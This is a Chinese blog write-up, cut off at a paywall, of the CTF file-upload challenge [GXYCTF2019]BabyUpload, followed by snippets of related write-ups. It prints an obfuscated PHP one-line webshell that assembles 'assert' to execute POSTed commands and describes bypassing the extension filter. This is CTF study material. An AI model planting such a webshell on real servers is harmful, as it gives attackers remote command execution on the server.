[GXYCTF2019]BabyUpload1 -- 题目分析与详解

最新推荐文章于 2025-03-19 13:21:13 发布
最新推荐文章于 2025-03-19 13:21:13 发布
阅读量3.9k 收藏 23
点赞数 13
分类专栏: BUUCTF 文章标签: 安全 Upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_79800344/article/details/136428034
版权

目录

一、题目分析

1、判断题目类型:

2、上传不同类型的文件进行测试:

二、题目详解

1、写出.htaccess文件:

2、.htaccess 文件配合 .jpg 上传:

3、利用 中国蚁剑/中国菜刀 获取flag:

一、题目分析

1、判断题目类型:

打开靶机,进入靶场,页面如图所示:

判断题目类型为:文件上传漏洞类型。

2、上传不同类型的文件进行测试:

(1)首先上传一句话木马 test.php,代码如下:

<?php
	$a="a"."s";
	$b="s"."e"."rt";
	$c=$a.$b;
	$c($_POST['cmd']);
?>

代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。

上传后页面如下图:

 

由此我们得知,文件后缀不可以有ph,那么php3,php5,phtml等后缀自然无法使用了。

(2)将文件后缀改为 jpg,上传后页面如下图:

最低0.47元/天 解锁文章
[系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
杨秀璋的专栏
12-27 1万+
娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全、CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来,大家一起进步。 系统安全系列作者将深入研究恶意样本分析、逆向分析、漏洞利用、攻防实战等,通过在线笔记和实践操作的形式分享博友们学习。前文通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程。这篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),
BUUCTF [GXYCTF2019]BabyUpload 1详解(.htaccess配置文件特性)
m0_73734159的博客
11-29 2176
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性。倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码。先截断数据包再把上传的111.jpg文件更名为.htaccess文件。右键Repeater。
[GXYCTF2019]BabyUpload 1 文件上传
weixin_45577185的博客
07-22 2045
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"
[GXYCTF2019]BabyUpload1 通关记录
最新发布
2402_88178163的博客
03-19 799
所以他可能是存在对文本内容有后端检测这时我们尝试去掉一句话木马的一些东西比如<> <?上传后发现提示不能有ph 这时phtml php3 php5我们就不进行绕过考虑了 这时我们抓包进行分析看看是哪的问题 这里我们仅仅修改了上传名 改为了jpg后缀 他又给我们进行了报错但是我们可以发现报错内容和不改后缀之前存在不同。发现是可以上传成功的 但是这时候问题就来了 虽然我们成功上传了文件但是它是一个jpg后缀的文件 如果网页不存在文件包含漏洞我们直接访问文件位置 里面的代码是无法被直接解析的。
[GXYCTF2019]BabyUpload1
qq_64201116的博客
05-14 3021
小小的文件上传,拿下!
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 1134
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
[GXYCTF2019]BabyUpload 1
shinygod的博客
02-28 363
目录
BuuCTF [GXYCTF2019]禁止套娃详解(两种方法)
2301_76690905的博客
10-28 934
点入题目没有提示,常规抓包看源码扫目录,用dirsearch扫目录的时候扫出git第一眼看见第二个if语句,if(';R)?\)/', NULL, $_GET['exp']))可以看出这是典型的无参数rce,然后是后面的if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']),这里限制了phpinfo(),getcwd()这些函数用不了。
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3912
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
2019 CSP-J认证答案详解解析
在单项选择题部分,题目涵盖了计算机基础知识,例如顶级域名(.cn代表中国)、位运算、数据单位(1Byte等于8bits)、算法分析(如链表访问特性)、数学问题(如斐波那契序列、素数分布)、编码问题(如ASCII码值97...
[GXYCTF2019]BabyUpload
borrrrring的博客
07-23 1053
[GXYCTF2019]BabyUpload 进入靶机我们可以看到这应该是通过文件上传一句话木马之后连接蚁剑得到flag 首先我们测试一下能上传哪些文件 我先尝试上传了.jpg文件发现显示了这样一句话 不能传.jpg文件??? 按道理来说这不合理,然后我就尝试传了另外一个.jpg文件,发现上传成功了。。。 我猜测这应该是对.jpg文件的大小进行了限制。 尝试上传php文件 也就是说php、phtml等这些后缀是不能进行上传的。 那么我们可以通过先上传.htaccess文件再上传含有一句话木马的.
BUU实战笔记——[GXYCTF2019]BabyUpload 1
qq_51175992的博客
07-14 1054
对于文件上传一般就是先找到可以上传的文件类型,然后看传上去的文件是否可以正常使用,若不行,再考虑配置文件的方法。
[GXYCTF2019]BabySQli 1
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码的哈希值。在第三个引用中,进行了一个简单的测试,通过联合查询将用户名设置为'zhangsan'并选择了一些假数据。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值